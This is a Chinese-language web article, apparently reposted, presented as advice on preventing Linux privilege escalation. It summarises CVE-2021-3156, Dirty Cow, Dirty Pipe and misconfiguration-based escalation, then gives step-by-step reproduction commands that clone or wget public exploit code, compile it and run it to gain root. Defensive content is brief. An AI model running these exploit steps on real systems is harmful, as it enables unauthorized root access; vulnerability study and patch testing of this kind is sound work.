如何防范Linux提权漏洞,保护系统安全的关键步骤是什么?

一、CVE-2021-3156 Linux提权漏洞

项目 详情
漏洞简介 2021年1月26日,Linux安全工具sudo被发现存在严重的基于堆缓冲区溢出漏洞,利用这一漏洞,攻击者无需知道用户密码,即可获得root权限。
危险等级 该漏洞的危险等级评分为7分,属于高危漏洞。
受影响版本 Sudo 1.8.2 – 1.8.31p2
Sudo 1.9.0 – 1.9.5p1
不受影响版本 Sudo >= 1.9.5p2。
复现步骤 1. 查看Linux及sudo版本
2. 简单测试漏洞是否存在
3. 下载并编译exp
4. 添加执行权限
5. 进行提权测试。
解决方案 官方已在sudo新版本1.9.5p2中修复了该漏洞,建议受影响的用户尽快升级版本进行防护。

其他常见Linux提权方式

提权方式 详情
内核漏洞提权 脏牛漏洞(Dirty Cow):低权限用户可以覆盖重写任意只读文件中的数据,从而提升权限至root。
CVE-2024-1086:影响多个版本的Linux内核,允许本地低权限威胁者获取root权限。
SUID配置错误提权 通过设置SUID权限,普通用户可以在执行过程中暂时获得文件拥有者的权限,从而提权。
计划任务提权 通过修改具有root权限的计划任务脚本来实现提权。
NFS提权 如果NFS服务器中存在no_root_squash选项,客户端可以使用root用户对共享目录进行操作,从而实现提权。

具体提权案例

CVE-2021-3156漏洞复现

如何防范Linux提权漏洞,保护系统安全的关键步骤是什么?插图1
(图片来源网络,侵删)
步骤 命令/操作
1 lsb_release -a
sudo -V
2 sudoedit -s /
3 git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156
4 make
5 chmod a+x sudo-hax-me-a-sandwich
6 ./sudo-hax-me-a-sandwich 0

Dirty Pipe漏洞复现(CVE-2022-0847)

步骤 命令/操作
1 uname -a
useradd -m pikaqiu
useradd -s /bin/bash pikaqiu2
2 su pikaqiu
wget https://haxx.in/files/dirtypipez.c
gcc dirtypipez.c -o exp
3 sudo find / -perm -u=s -type f 2>/dev/null
./exp /usr/bin/chfn

是关于Linux提权漏洞的详细归纳,包括具体的漏洞案例和提权方法,建议系统管理员定期检查和更新系统,以确保系统安全。

各位小伙伴们,我刚刚为大家分享了有关linux提权漏洞的知识,希望对你们有所帮助。如果您还有其他相关问题需要解决,欢迎随时提出哦!

如何防范Linux提权漏洞,保护系统安全的关键步骤是什么?插图3
(图片来源网络,侵删)

本文来源于互联网,如若侵权,请联系管理员删除,本文链接:https://www.9969.net/67114.html

小末小末
上一篇 2024年10月3日 20:39
下一篇 2024年10月3日 20:49

相关推荐